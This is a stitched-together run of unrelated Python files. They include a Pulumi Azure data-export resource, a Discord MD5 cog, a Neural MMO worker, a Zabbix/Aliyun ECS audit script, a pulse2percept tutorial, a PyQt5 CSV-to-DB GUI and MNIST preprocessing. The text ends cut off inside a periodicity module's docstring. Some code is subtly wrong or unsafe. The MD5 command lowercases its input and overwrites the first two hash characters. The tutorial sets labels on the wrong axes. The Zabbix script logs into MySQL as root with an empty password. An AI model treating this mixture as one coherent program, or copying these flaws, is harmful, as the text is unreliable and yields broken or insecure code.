:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Log Analytics Data Export should exist. Changing this forces a new Log Analytics Data Export Rule to be created. :param pulumi.Input[Sequence[pulumi.Input[str]]] table_names: A list of table names to export to the destination resource, for example: `["Heartbeat", "SecurityEvent"]`. :param pulumi.Input[str] workspace_resource_id: The resource ID of the workspace. Changing this forces a new Log Analytics Data Export Rule to be created. """ if __name__ is not None: warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning) resource_name = __name__ if __opts__ is not None: warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning) opts = __opts__ if opts is None: opts = pulumi.ResourceOptions() if not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') if opts.version is None: opts.version = _utilities.get_version() if opts.id is None: if __props__ is not None: raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource') __props__ = dict() if destination_resource_id is None: raise TypeError("Missing required property 'destination_resource_id'") __props__['destination_resource_id'] = destination_resource_id __props__['enabled'] = enabled __props__['name'] = name if resource_group_name is None: raise TypeError("Missing required property 'resource_group_name'") __props__['resource_group_name'] = resource_group_name if table_names is None: raise TypeError("Missing required property 'table_names'") __props__['table_names'] = table_names if workspace_resource_id is None: raise TypeError("Missing required property 'workspace_resource_id'") __props__['workspace_resource_id'] = workspace_resource_id __props__['export_rule_id'] = None super(DataExportRule, __self__).__init__( 'azure:loganalytics/dataExportRule:DataExportRule', resource_name, __props__, opts) @staticmethod def get(resource_name: str, id: pulumi.Input[str], opts: Optional[pulumi.ResourceOptions] = None, destination_resource_id: Optional[pulumi.Input[str]] = None, enabled: Optional[pulumi.Input[bool]] = None, export_rule_id: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, resource_group_name: Optional[pulumi.Input[str]] = None, table_names: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, workspace_resource_id: Optional[pulumi.Input[str]] = None) -> 'DataExportRule': """ Get an existing DataExportRule resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] destination_resource_id: The destination resource ID. It should be a storage account, an event hub namespace or an event hub. If the destination is an event hub namespace, an event hub would be created for each table automatically. :param pulumi.Input[bool] enabled: Is this Log Analytics Data Export Rule when enabled? Possible values include `true` or `false`. Defaults to `false`. :param pulumi.Input[str] export_rule_id: The ID of the created Data Export Rule. :param pulumi.Input[str] name: The name of the Log Analytics Data Export Rule. Changing this forces a new Log Analytics Data Export Rule to be created. 
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Log Analytics Data Export should exist. Changing this forces a new Log Analytics Data Export Rule to be created. :param pulumi.Input[Sequence[pulumi.Input[str]]] table_names: A list of table names to export to the destination resource, for example: `["Heartbeat", "SecurityEvent"]`. :param pulumi.Input[str] workspace_resource_id: The resource ID of the workspace. Changing this forces a new Log Analytics Data Export Rule to be created. """ opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)) __props__ = dict() __props__["destination_resource_id"] = destination_resource_id __props__["enabled"] = enabled __props__["export_rule_id"] = export_rule_id __props__["name"] = name __props__["resource_group_name"] = resource_group_name __props__["table_names"] = table_names __props__["workspace_resource_id"] = workspace_resource_id return DataExportRule(resource_name, opts=opts, __props__=__props__) @property @pulumi.getter(name="destinationResourceId") def destination_resource_id(self) -> pulumi.Output[str]: """ The destination resource ID. It should be a storage account, an event hub namespace or an event hub. If the destination is an event hub namespace, an event hub would be created for each table automatically. """ return pulumi.get(self, "destination_resource_id") @property @pulumi.getter def enabled(self) -> pulumi.Output[Optional[bool]]: """ Is this Log Analytics Data Export Rule when enabled? Possible values include `true` or `false`. Defaults to `false`. """ return pulumi.get(self, "enabled") @property @pulumi.getter(name="exportRuleId") def export_rule_id(self) -> pulumi.Output[str]: """ The ID of the created Data Export Rule. """ return pulumi.get(self, "export_rule_id") @property @pulumi.getter def name(self) -> pulumi.Output[str]: """ The name of the Log Analytics Data Export Rule. Changing this forces a new Log Analytics Data Export Rule to be created. """ return pulumi.get(self, "name") @property @pulumi.getter(name="resourceGroupName") def resource_group_name(self) -> pulumi.Output[str]: """ The name of the Resource Group where the Log Analytics Data Export should exist. Changing this forces a new Log Analytics Data Export Rule to be created. """ return pulumi.get(self, "resource_group_name") @property @pulumi.getter(name="tableNames") def table_names(self) -> pulumi.Output[Sequence[str]]: """ A list of table names to export to the destination resource, for example: `["Heartbeat", "SecurityEvent"]`. """ return pulumi.get(self, "table_names") @property @pulumi.getter(name="workspaceResourceId") def workspace_resource_id(self) -> pulumi.Output[str]: """ The resource ID of the workspace. Changing this forces a new Log Analytics Data Export Rule to be created. 
""" return pulumi.get(self, "workspace_resource_id") def translate_output_property(self, prop): return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop def translate_input_property(self, prop): return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop from redbot.core import commands from redbot.core.bot import Red import discord import hashlib class MD5(commands.Cog): def __init__(self, bot: Red): self.bot = bot async def red_delete_data_for_user(self, **kwargs): """Nothing to delete""" return @commands.command() async def md5(self, ctx, string): if string: md5Result = hashlib.md5(string.encode("utf-8").lower()).hexdigest().upper() embedMD5 = discord.Embed(title="MD5 Hash", color=0xC60000) embedMD5.add_field( name=string.lower(), value="00" + md5Result[2:16], inline=False ) await ctx.reply(embed=embedMD5) else: embedNoString = discord.Embed(title="MD5 Hash", color=0xC60000) embedNoString.add_field( name="Error", value="Please enter a string", inline=False ) await ctx.reply(embed=embedNoString) projekt/sword.py1-10 from pdb import set_trace as T from collections import defaultdict import numpy as np import ray import projekt from forge import trinity from forge.trinity.timed import runtime from forge.blade.core import realm from forge.ethyr.io import Stimulus, Action from forge.ethyr.experience import RolloutManager from copy import deepcopy @ray.remote class Sword(trinity.Sword): '''Core level Sword API demo This core level rollout worker node runs a copy of the environment and all associated agents. Multiple Swords return observations, actions, and rewards to each server level optimizer node.''' def __init__(self, trin, config, args, idx): '''Initializes a model, env, and relevent utilities''' super().__init__(trin, config, args, idx) config = deepcopy(config) config.DEVICE = 'cpu:0' self.config = config self.args = args self.ent = 0 self.net = projekt.ANN(config) self.obs, _, _, _ = self.env.reset() #For the renderer self.manager = RolloutManager() @runtime def step(self, packet=None): '''Synchronizes weights from upstream and collects a fixed amount of experience.''' self.net.recvUpdate(packet) while self.manager.nUpdates < self.config.SYNCUPDATES: self.tick() return self.manager.send() def tick(self): '''Steps the agent and environment Processes observations, selects actions, and steps the environment to obtain new observations. Serializes (obs, action, reward) triplets for communication to an upstream optimizer node.''' #Batch observations and make decisions stims = Stimulus.process(self.obs) self.manager.collectInputs(self.env, self.obs, stims) actions, outs = [], [] for batch in self.manager.batched( self.config.SYNCBATCH): pop, rollouts, batch = batch keys, obs, stim, _, _, _, _ = batch #Run the policy atns, out, _ = self.net(pop, stim, obs=obs) actions += atns outs += out #Step the environment and all agents at once. #The environment handles action priotization etc. 
actions = dict(((o[1].entID, a) for o, a in zip(self.obs, actions))) nxtObs, rewards, dones, info = super().step(actions) #Update the experience buffer #The envrionment is used to generate serialization keys self.manager.collectOutputs(self.env, self.obs, outs, rewards, dones) self.obs = nxtObs zabbix/scripts/ali-ecs-monitor/check_ali_ecs.py #!/usr/bin/env python3 #import configparser import hashlib import json import math import os import pymysql import time import sys from aliyunsdkcore.client import AcsClient from aliyunsdkcore.acs_exception.exceptions import ClientException from aliyunsdkcore.acs_exception.exceptions import ServerException from aliyunsdkecs.request.v20140526 import DescribeInstancesRequest from aliyunsdkecs.request.v20140526 import StopInstanceRequest PAGESIZE = 100 def Get_node_ip_name(instances_list): global NODE_INNER_IP_NAMES for instance in instances_list: if instance.get("InnerIpAddress").get("IpAddress"): inner_ip = instance.get("InnerIpAddress").get("IpAddress")[0] instance_name = instance.get("InstanceName") if inner_ip not in NODE_INNER_IP_NAMES: NODE_INNER_IP_NAMES[inner_ip] = instance_name def Get_instances(pagenum): global NODE_COUNT global PAGESIZE request.set_PageSize(PAGESIZE) request.set_PageNumber(pagenum) response = CLIENT.do_action_with_exception(request) json_contents = json.loads(response) if not NODE_COUNT: NODE_COUNT = json_contents.get("TotalCount") instances_list = json_contents.get("Instances").get("Instance") Get_node_ip_name(instances_list) def Get_ip_from_zabbix(): db = pymysql.connect("localhost","root","","zabbix" ) cursor = db.cursor() cursor.execute("select host from hosts") data = cursor.fetchone() db.close() return data def Notification(dict_ip_name): contents = '' if dict_ip_name: for ip,name in dict_ip_name.items(): contents = contents + '实例名: ' + name + ', ip: ' + ip + r'\n' return contents if __name__ == "__main__": #conf = configparser.ConfigParser() #conf.read('ali.ini') #accessKeyId = conf.get('client', 'access-key-id') #accessKeySecret = conf.get('client', 'accesskeysecret') #regionId = conf.get('client', 'regionid') accessKeyId = 'ali-key' accessKeySecret = 'ali-secret' regionId = 'region' CLIENT = AcsClient(accessKeyId, accessKeySecret, regionId) request = DescribeInstancesRequest.DescribeInstancesRequest() # 发起API请求并显示返回值 request.set_PageSize(1) request.set_PageNumber(1) response = CLIENT.do_action_with_exception(request) json_contents = json.loads(response) NODE_COUNT = json_contents.get("TotalCount") NODE_INNER_IP_NAMES = {} last_page = math.ceil(NODE_COUNT / PAGESIZE) + 1 for pagenum in range(1, last_page): Get_instances(pagenum) #print(NODE_INNER_IP_NAMES) db = pymysql.connect(user="zabbix",passwd='',db='zabbix',host='10.10.10.10',charset='utf8') cursor = db.cursor() cursor.execute("select ip,host from interface, hosts where interface.hostid = hosts.hostid") data = cursor.fetchall() db.close() zabbix_ip_names = {} for row in data: zabbix_ip_names[row[0]]=row[1] lost_ip_name = {} for ip,name in NODE_INNER_IP_NAMES.items(): if ip not in zabbix_ip_names.keys(): lost_ip_name[ip] = name print(Notification(lost_ip_name)) #print(jsonData) # -*- coding: utf-8 -*- """ ============================================================================ Generating simple pulses and pulse trains ============================================================================ This example shows how to build and visualize basic types of stimuli such as :py:class:`~pulse2percept.stimuli.MonophasicPulse`, 
:py:class:`~pulse2percept.stimuli.BiphasicPulse` or a :py:class:`~pulse2percept.stimuli.PulseTrain` for a given implant. A monophasic pulse has a single phase and can be either anodic (by definition: has a positive current amplitude) or cathodic (negative current amplitude). A biphasic pulse is generally charge-balanced for safety reasons (i.e., the net current must sum to zero over time) and defined as either anodic-first or cathodic-first. Multiple pulses can form a pulse train. """ # sphinx_gallery_thumbnail_number = 7 ############################################################################## # Simplest stimulus # --------------------- # :py:class:`~pulse2percept.stimuli.Stimulus` is the base class to generate # different types of stimuli. The simplest way to instantiate a Stimulus is # to pass a scalar value which is interpreted as the current amplitude # for a single electrode. # Let's start by importing necessary modules from pulse2percept.stimuli import (MonophasicPulse, BiphasicPulse, Stimulus, PulseTrain) import numpy as np stim = Stimulus(10) ############################################################################## # Parameters we don't specify will take on default values. We can inspect # all current model parameters as follows: print(stim) ############################################################################## # This command also reveals a number of other parameters to set, such as: # # * ``electrodes``: We can either specify the electrodes in the source # or within the stimulus. If none are specified it looks up the source # electrode. # # * ``metadata``: Optionally we can include metadata to the stimulus we # generate as a dictionary. # # To change parameter values, either pass them directly to the constructor # above or set them by hand, like this: stim.metadata = {'name': 'A simple stimulus', 'date': '2020-01-01'} stim ############################################################################## # A monophasic pulse # -------------------- # We can specify the arguments of the monophasic pulse as follows: pulse_type = 'anodic' # anodic: positive amplitude, cathodic: negative pulse_dur = 4.6 / 1000 # pulse duration in seconds delay_dur = 10.0 / 1000 # pulse delivered after delay in seconds stim_dur = 0.5 # stimulus duration in seconds (pulse padded with zeros) time_step = 0.1 / 1000 # temporal sampling step in seconds ############################################################################## # The sampling step ``time_step`` defines at which temporal resolution the # stimulus is resolved. In the above example, the time step is 0.1 ms. # # By calling Stimulus with a ``MonophasicPulse`` source, we can generate a # single pulse: monophasic_stim = Stimulus(MonophasicPulse(ptype=pulse_type, pdur=pulse_dur, delay_dur=delay_dur, stim_dur=stim_dur, tsample=time_step)) print(monophasic_stim) ############################################################################## # Here, ``data`` is a 2D NumPy array where rows are electrodes and columns are # the points in time. Since we did not specify any electrode names in # ``MonophasicPulse``, the number of electrodes is inferred from the input # source type. There is only one row in the above example, denoting a single # electrode. # # By default, the :py:class:`~pulse2percept.stimuli.MonophasicPulse` object # automatically assumes a current amplitude of 1 uA. 
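# A quick check of that default (a sketch; assumes the 1 uA default applies to
# the `monophasic_stim` created above):
import numpy as np
print(np.max(np.abs(monophasic_stim.data)))  # expected to print 1.0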
############################################################################## # We can visualize the generated pulse using Matplotlib: import matplotlib.pyplot as plt fig, ax = plt.subplots(figsize=(8, 5)) ax.plot(monophasic_stim.time, monophasic_stim.data[0, :]) ax.set_xlabel('Time (s)') ax.set_ylabel('Amplitude ($\mu$A)') ############################################################################### # A biphasic pulse # ------------------ # Similarly, we can generate a biphasic pulse by changing the source of the # stimulus to :py:class:`~pulse2percept.stimuli.BiphasicPulse`. This time # parameter ``ptype`` can either be 'anodicfirst' or 'cathodicfirst'. # set relevant parameters pulse_type = 'cathodicfirst' biphasic_stim = Stimulus(BiphasicPulse(ptype=pulse_type, pdur=pulse_dur, tsample=time_step)) ############################################################################### # If we visualize this stimulus, we can see the difference between a monophasic # and biphasic pulse: # Create a figure with two subplots fig, axes = plt.subplots(1, 2, figsize=(8, 5)) # First, plot monophasic pulse axes[0].plot(monophasic_stim.time, monophasic_stim.data[0]) ax.set_xlabel('Time (s)') ax.set_ylabel('Amplitude ($\mu$A)') # Second, plot biphasic pulse axes[1].plot(biphasic_stim.time, biphasic_stim.data[0]) ax.set_xlabel('Time (s)') ax.set_ylabel('Amplitude ($\mu$A)') ############################################################################### # Changing pulse amplitude # ---------------------------------- # For any given pulse, we can modify the amplitude by indexing into the ``data`` # row that corresponds to the desired electrode. In the above example, we only # have one electrode (index 0). # Let's say we want the amplitude of the monophasic pulse to be 10 micro amps. # We have two options: either change the values of the ``data`` array directly: # get the data structure by indexing the electrode at 0 monophasic_stim.data[0] = 10 * monophasic_stim.data[0] print(monophasic_stim) ############################################################################### # Or we can create a NumPy array and assign that to the data structure of the # stimulus: # recreate the same stimulus with an amplitude 1 microAmps. monophasic_stim = Stimulus(MonophasicPulse(ptype='anodic', pdur=pulse_dur, delay_dur=delay_dur, stim_dur=stim_dur, tsample=time_step)) monophasic_stim.data[0] = 10 * np.ones_like(monophasic_stim.data[0]) print(monophasic_stim) ############################################################################### # Similarly, let's say we want the cathodic part of the biphasic pulse to be -5 # micro amps, and the anodic part to be +20 micro amps (note that this stimulus # wouldn't be charge-balanced). # # We first need to find the halfway point where the current switches from # cathodic to anodic. 
To do that we first get the length of the pulse by # indexing the single electrode at 0 length = len(biphasic_stim.data[0]) print(length) # Find the halfway where cathodic turns into anodic pulse half = int(len(biphasic_stim.data[0]) / 2) print("Halfway index is", half) # change the first half of the pulse to be 5 times larger biphasic_stim.data[0][0:half] = 5 * biphasic_stim.data[0][0:half] # change the second half to be 20 times larger biphasic_stim.data[0][half:length] = 20 * biphasic_stim.data[0][half:length] ############################################################################### # Let's plot the monophasic and biphasic pulses again: # Create a figure with two subplots fig, axes = plt.subplots(ncols=2, figsize=(8, 5)) # First, plot monophasic pulse axes[0].plot(monophasic_stim.time, monophasic_stim.data[0]) axes[0].set_xlabel('Time (s)') axes[0].set_ylabel('Amplitude ($\mu$A)') # Second, plot biphasic pulse axes[1].plot(biphasic_stim.time, biphasic_stim.data[0]) axes[1].set_xlabel('Time (s)') axes[1].set_ylabel('Amplitude ($\mu$A)') fig.tight_layout() ############################################################################### # Generating standard pulse trains # ---------------------------------- # The easiest way to generate a pulse train is to use the # :py:class:`~pulse2percept.stimuli.PulseTrain` object, which allows for # various stimulus attributes to be specified: time_step = 0.1 / 1000 # temporal sampling in seconds freq = 20 # frequency in Hz amp = 100 # maximum amplitude of the pulse train in microAmps dur = 0.2 # total duration of the pulse train in seconds pulse_type = 'cathodicfirst' # whether the first phase is positive or negative pulse_order = 'gapfirst' # whether the train starts with gap or a pulse. # Define the pulse train with given parameters ptrain = PulseTrain(tsample=time_step, freq=freq, dur=dur, amp=amp, pulsetype=pulse_type, pulseorder=pulse_order) # Create a new stimulus where the pulse train is the source ptrain_stim = Stimulus(ptrain) # Visualize: fig, ax = plt.subplots(figsize=(8, 5)) ax.plot(ptrain_stim.time, ptrain_stim.data[0, :]) ax.set_xlabel('Time (s)') ax.set_ylabel('Amplitude ($\mu$A)') ############################################################################### # Alternatively, we are free to specify a discrete set of points in time and # the current amplitude we would like to apply at those times. # # It is important to note that the :py:class:`~pulse2percept.stimuli.Stimulus` # object will linearly interpolate between specified time points. 
# For example, the following generates a simple sawtooth stimulus: stim = Stimulus([[0, -10, 10, -10, 10, -10, 0]], time=[0, 0.1, 0.3, 0.5, 0.7, 0.9, 1.0]) fig, ax = plt.subplots(figsize=(8, 5)) ax.plot(stim.time, stim.data[0, :]) ax.set_xlabel('Time (s)') ax.set_ylabel('Amplitude ($\mu$A)') ############################################################################## # For a biphasic pulse, we need to specify both the rising edge (low-to-high # transition) and falling edge (high-to-low transition) of the signal: stim = Stimulus([[0, 0, 10, 10, 0, 0]], time=[0, 0.1, 0.1, 0.2, 0.2, 1.0]) fig, ax = plt.subplots(figsize=(8, 5)) ax.plot(stim.time, stim.data[0, :]) ax.set_xlabel('Time (s)') ax.set_ylabel('Amplitude ($\mu$A)') ############################################################################## # We can thus generate arbitrarily complex stimuli: stim = Stimulus([[0, 0, 20, 20, -5, -5, 0, 0, 0, 20, 20, -5, -5, 0, 0]], time=[0, 0.1, 0.1, 0.2, 0.2, 0.6, 0.6, 1.0, 1.1, 1.1, 1.2, 1.2, 1.6, 1.6, 2.0]) fig, ax = plt.subplots(figsize=(8, 5)) ax.plot(stim.time, stim.data[0, :]) ax.set_xlabel('Time (s)') ax.set_ylabel('Amplitude ($\mu$A)') 1-10 # -*- coding: utf-8 -*- # Form implementation generated from reading ui file 'gui_csv_to_db.ui' # # Created by: PyQt5 UI code generator 5.15.4 # # WARNING: Any manual changes made to this file will be lost when pyuic5 is # run again. Do not edit this file unless you know what you are doing. from PyQt5 import QtCore, QtGui, QtWidgets from csvtodb.Mysql import Mysql from csvtodb.Laravel import Laravel from csvtodb.Csv import Csv import re class Ui_MainWindow(object): def setupUi(self, MainWindow): # set main window MainWindow.setObjectName("MainWindow") MainWindow.resize(637, 479) font = QtGui.QFont() font.setFamily("MS Shell Dlg 2") font.setBold(False) font.setItalic(False) font.setWeight(50) MainWindow.setFont(font) self.centralwidget = QtWidgets.QWidget(MainWindow) self.centralwidget.setObjectName("centralwidget") # title dbsm self.title_dbsm = QtWidgets.QLabel(self.centralwidget) self.title_dbsm.setGeometry(QtCore.QRect(10, 50, 91, 31)) font = QtGui.QFont() font.setFamily("Amiri") font.setPointSize(20) font.setBold(False) font.setItalic(False) font.setWeight(50) self.title_dbsm.setFont(font) self.title_dbsm.setObjectName("title_dbsm") # title framework self.title_framework = QtWidgets.QLabel(self.centralwidget) self.title_framework.setGeometry(QtCore.QRect(10, 200, 131, 31)) font = QtGui.QFont() font.setFamily("Amiri") font.setPointSize(20) font.setBold(False) font.setItalic(False) font.setWeight(50) self.title_framework.setFont(font) self.title_framework.setObjectName("title_framework") # radio mysql self.btn_mysql = QtWidgets.QRadioButton(self.centralwidget) self.btn_mysql.setGeometry(QtCore.QRect(10, 90, 82, 17)) self.btn_mysql.setObjectName("btn_mysql") self.btn_mysql.toggled.connect(lambda: self.display_opt(dbsm=True)) # radio laravel self.btn_laravel = QtWidgets.QRadioButton(self.centralwidget) self.btn_laravel.setGeometry(QtCore.QRect(10, 250, 82, 17)) self.btn_laravel.setObjectName("btn_laravel") self.btn_laravel.toggled.connect(lambda: self.display_opt(dbsm=False)) # send btn self.send = QtWidgets.QPushButton(self.centralwidget) self.send.setGeometry(QtCore.QRect(0, 400, 631, 71)) self.send.setObjectName("send") self.send.clicked.connect(self.generate) # select csv btn self.btn_select_csv = QtWidgets.QPushButton(self.centralwidget) self.btn_select_csv.setGeometry(QtCore.QRect(290, 60, 75, 23)) 
self.btn_select_csv.setObjectName("btn_select_csv") self.btn_select_csv.clicked.connect(self.browse_file) # display csv filepath self.csv_filepath_display = QtWidgets.QLineEdit(self.centralwidget) self.csv_filepath_display.setEnabled(True) self.csv_filepath_display.setGeometry(QtCore.QRect(370, 60, 231, 20)) self.csv_filepath_display.setText("") self.csv_filepath_display.setReadOnly(False) self.csv_filepath_display.setObjectName("csv_filepath_display") # btn migration file for framework self.btn_migration_file = QtWidgets.QPushButton(self.centralwidget) self.btn_migration_file.setGeometry(QtCore.QRect(290, 110, 111, 23)) self.btn_migration_file.setObjectName("btn_migration_file") self.btn_migration_file.setVisible(False) self.btn_migration_file.clicked.connect(lambda: self.mig_seed_file(type='migration')) # btn seeder file for framework self.btn_seeder_file = QtWidgets.QPushButton(self.centralwidget) self.btn_seeder_file.setGeometry(QtCore.QRect(290, 150, 111, 23)) self.btn_seeder_file.setObjectName("btn_seeder_file") self.btn_seeder_file.setVisible(False) self.btn_seeder_file.clicked.connect(lambda: self.mig_seed_file(type='seeder')) # select migration seeder for dbsm self.select_migration_seeder = QtWidgets.QComboBox(self.centralwidget) self.select_migration_seeder.setGeometry(QtCore.QRect(290, 150, 120, 23)) self.select_migration_seeder.setObjectName("btn_dbsm_migration_seeder") self.select_migration_seeder.addItem("") self.select_migration_seeder.addItem("") self.select_migration_seeder.addItem("") self.select_migration_seeder.setVisible(False) # display migration filepath for framework self.label_migration_file = QtWidgets.QLineEdit(self.centralwidget) self.label_migration_file.setGeometry(QtCore.QRect(410, 110, 221, 16)) self.label_migration_file.setObjectName("label_migration_file") self.label_migration_file.setVisible(False) # display seeder filepath for framework self.label_seeder_file = QtWidgets.QLineEdit(self.centralwidget) self.label_seeder_file.setGeometry(QtCore.QRect(410, 150, 221, 16)) self.label_seeder_file.setObjectName("label_seeder_file") self.label_seeder_file.setVisible(False) # save in for dbsm self.btn_save_dbsm = QtWidgets.QPushButton(self.centralwidget) self.btn_save_dbsm.setGeometry(QtCore.QRect(290, 110, 111, 23)) self.btn_save_dbsm.setObjectName("btn_save_dbsm") self.btn_save_dbsm.setVisible(False) self.btn_save_dbsm.clicked.connect(self.save_in) # label for save in self.label_save_in = QtWidgets.QLineEdit(self.centralwidget) self.label_save_in.setGeometry(QtCore.QRect(410, 110, 221, 16)) self.label_save_in.setObjectName("label_migration_file") self.label_save_in.setVisible(False) MainWindow.setCentralWidget(self.centralwidget) self.retranslateUi(MainWindow) QtCore.QMetaObject.connectSlotsByName(MainWindow) def retranslateUi(self, MainWindow): _translate = QtCore.QCoreApplication.translate MainWindow.setWindowTitle(_translate("MainWindow", "Csv To DB")) self.title_dbsm.setText(_translate("MainWindow", "DBSM")) self.title_framework.setText(_translate("MainWindow", "Framework")) self.btn_mysql.setText(_translate("MainWindow", "Mysql")) self.btn_laravel.setText(_translate("MainWindow", "Laravel")) self.send.setText(_translate("MainWindow", "Generate")) self.btn_select_csv.setText(_translate("MainWindow", "Select CSV")) self.btn_migration_file.setText(_translate("MainWindow", "migration file")) self.btn_seeder_file.setText(_translate("MainWindow", "seeder file")) self.select_migration_seeder.setItemText(0, _translate("MainWindow", "migration")) 
self.select_migration_seeder.setItemText(1, _translate("MainWindow", "seeder")) self.select_migration_seeder.setItemText(2, _translate("MainWindow", "migration + seeder")) self.label_migration_file.setText(_translate("MainWindow", "")) self.label_seeder_file.setText(_translate("MainWindow", "")) self.btn_save_dbsm.setText(_translate("MainWindow", "save in")) self.label_save_in.setText(_translate("MainWindow", "")) # ------------------------------- # method for btn # ------------------------------- def browse_file(self): """ open folder dialog menu :return: """ file = QtWidgets.QFileDialog.getOpenFileName(caption='Select CSV file', directory='D:\\', filter='*.csv') self.csv_filepath_display.setText(file[0]) def save_in(self): """ save in for dbsm :return: """ file = QtWidgets.QFileDialog.getExistingDirectory(caption='Select where to save the file', directory='./') self.label_save_in.setVisible(True) self.label_save_in.setText(file) def display_opt(self, dbsm: bool): """ display info for mysql\n mode: - dbsm - framework :return: """ if dbsm: self.select_migration_seeder.setVisible(True if self.btn_mysql.isChecked() else False) self.btn_save_dbsm.setVisible(True if self.btn_mysql.isChecked() else False) else: self.btn_seeder_file.setVisible(True if self.btn_laravel.isChecked() else False) self.btn_migration_file.setVisible(True if self.btn_laravel.isChecked() else False) def mig_seed_file(self, type: str): """ migration or seeder file :return: """ file = QtWidgets.QFileDialog.getOpenFileName(caption=f'Select {type} file', directory='D:\\', filter='*.php') if type == 'migration': self.label_migration_file.setVisible(True) self.label_migration_file.setText(file[0]) else: self.label_seeder_file.setVisible(True) self.label_seeder_file.setText(file[0]) def generate(self): """ generate file from the csv :return: """ print('yes') filename = re.findall(r'[\w-]+\.csv', self.csv_filepath_display.text()) print('yes2') filepath = re.sub(r'[\/\\][\w-]+\.csv', '', self.csv_filepath_display.text(), 0) print('yes3') for name in filename: filename = re.sub(r'\.csv', '', name) csv = Csv(filename=filename, filepath=filepath) # mysql if self.btn_mysql.isChecked(): if self.label_save_in.text(): save_in = self.label_save_in.text() if self.select_migration_seeder.currentText() == 'migration': Mysql.new_table(csv=csv, filename=filename, filepath=save_in) elif self.select_migration_seeder.currentText() == 'seeder': Mysql.new_seeder(csv=csv, filename=filename, filepath=save_in) elif self.select_migration_seeder.currentText() == 'migration + seeder': Mysql.new_table(csv=csv, filename=filename, filepath=save_in) Mysql.new_seeder(csv=csv, filename=filename, filepath=save_in) # laravel elif self.btn_laravel.isChecked(): if self.label_migration_file.text(): filename = re.findall(r'[\w-]+\.php', self.label_migration_file.text()) filepath = re.sub(r'[\/\\][\w-]+\.php', '', self.label_migration_file.text(), 0) for name in filename: filename = re.sub(r'\.php', '', name) Laravel.new_migration(csv=csv, filename=filename, filepath=filepath) if self.label_seeder_file.text(): filename = re.findall(r'[\w-]+\.php', self.label_seeder_file.text()) filepath = re.sub(r'[\/\\][\w-]+\.php', '', self.label_seeder_file.text(), 0) for name in filename: filename = re.sub(r'\.php', '', name) Laravel.new_seeder(csv=csv, filename=filename, filepath=filepath) if __name__ == "__main__": import sys app = QtWidgets.QApplication(sys.argv) MainWindow = QtWidgets.QMainWindow() ui = Ui_MainWindow() ui.setupUi(MainWindow) MainWindow.show() 
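# app.exec_() below starts the Qt event loop and blocks until the last window
# is closed; its integer return value is the application's exit status, which
# is passed straight to sys.exit().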
sys.exit(app.exec_()) import numpy as np import pandas as pd from sklearn.utils import shuffle from sklearn.model_selection import train_test_split from keras.utils.np_utils import to_categorical import seaborn as sns def common_preprocessing(df): df = df.values.reshape(-1, 28, 28, 1) return df def preprocess_data(train, train_val_prop = 0.25, rnd_seed = 1): # Shuffle train = shuffle(train, random_state = rnd_seed) # Split x, y y_train = train["label"] x_train = train.drop(labels = ["label"], axis = 1) del train # Reshape images (from vector to matrix) x_train = common_preprocessing(x_train) # sns.countplot(y_train) # Value to categorical variable y_train = to_categorical(y_train, num_classes=10) # Split train/val x_train, x_val, y_train, y_val = train_test_split( x_train, y_train, test_size = train_val_prop, random_state = rnd_seed) return x_train, y_train, x_val, y_valdioph/periodicity import celerite2 import celerite2.theano import emcee import george import numpy as np import pymc3 as pm import pymc3_ext as pmx from scipy.optimize import minimize from scipy.stats import norm from .core import TSeries __all__ = [ "GeorgeModeler", "CeleriteModeler", "TheanoModeler", "QuasiPeriodicGP", "BrownianGP", "HarmonicGP", "BrownianTheanoGP", "HarmonicTheanoGP", ] def _gaussian(mu, sd): """Simple 1D Gaussian function generator. Parameters ---------- mu: float Mean. sd: float Standard deviation. Returns ------- pdf: function 1D Gaussian PDF with given parameters. """ def pdf(x): z = (x - mu) / sd return np.exp(-z * z / 2.0) / np.sqrt(2.0 * np.pi) / sd return pdf def make_ppf(x, pdf): """Generate an empirical Percent Point Function (inverse CDF) for an arbitrary PDF. Parameters --------- x: array-like Points at which to evaluate the PDF. pdf: array-like PDF sampled at x. Returns ------- ppf: function Interpolates the inverse CDF. """ cdf = np.cumsum(pdf) cdf /= cdf[-1] def ppf(q): icdf = np.interp(q, cdf, x) return icdf return ppf def make_gaussian_prior( signal, p_min=None, periods=None, a=1.0, b=2.0, n=8, fundamental_height=0.8, fundamental_width=0.1, ): """Generates a weighted sum of Gaussian PDFs as a probability prior on the logarithm of the signal period. Based on [#]_ Parameters ---------- signal: TSeries or array-like Input (quasi-)periodic signal. p_min: float, optional Lower cutoff period to filter signal. periods: list, optional List of higher cutoff periods to filter signal. Only periods between `p_min` and half the baseline will be considered. a, b, n: float, optional If `periods` is not given, then the first `n` powers of `b` scaled by `a` will be used: ``periods = a * b ** np.arange(n)`` fundamental_height: float, optional Weight of the gaussian mixture on the fundamental peak. The double and half harmonics both are equally weighted ``(1 - fundamental_height) / 2``. Defaults to 0.8. fundamental_width: float, optional Width (standard deviation) of the gaussian PDFs in the prior. Defaults to 0.1. Returns ------- gaussian_prior: function prior on the log-period See Also -------- periodicity.utils.acf_harmonic_quality References ---------- .. [#] , , , , , "Inferring probabilistic stellar rotation periods using Gaussian processes," MNRAS, February 2018. 
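Examples
--------
A minimal usage sketch (``signal`` here stands for any evenly sampled 1-D
quasi-periodic light curve; the period list and grid below are illustrative
values, not defaults of this module)::

    prior = make_gaussian_prior(signal, periods=[1, 2, 4, 8])
    log_p_grid = np.log(np.linspace(0.5, 20.0, 500))
    weights = prior(log_p_grid)  # mixture prior evaluated on a grid of log-periods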
